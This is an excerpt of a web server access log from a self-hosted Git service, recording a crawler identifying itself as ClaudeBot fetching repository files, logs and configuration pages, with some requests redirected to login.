192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 11011] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 11015] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11096] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=source" [Client 216.73.216.188] [Length 12786] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 216.73.216.188] [Length 11446] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11557] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 10300] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 216.73.216.188] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 96914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11789] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 216.73.216.188] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13516] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13899] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11898] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 216.73.216.188] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 10162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11551] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 10300] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 10168] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 216.73.216.188] [Length 10993] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=rendered" [Client 216.73.216.188] [Length 10991] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 216.73.216.188] [Length 10139] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 987902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 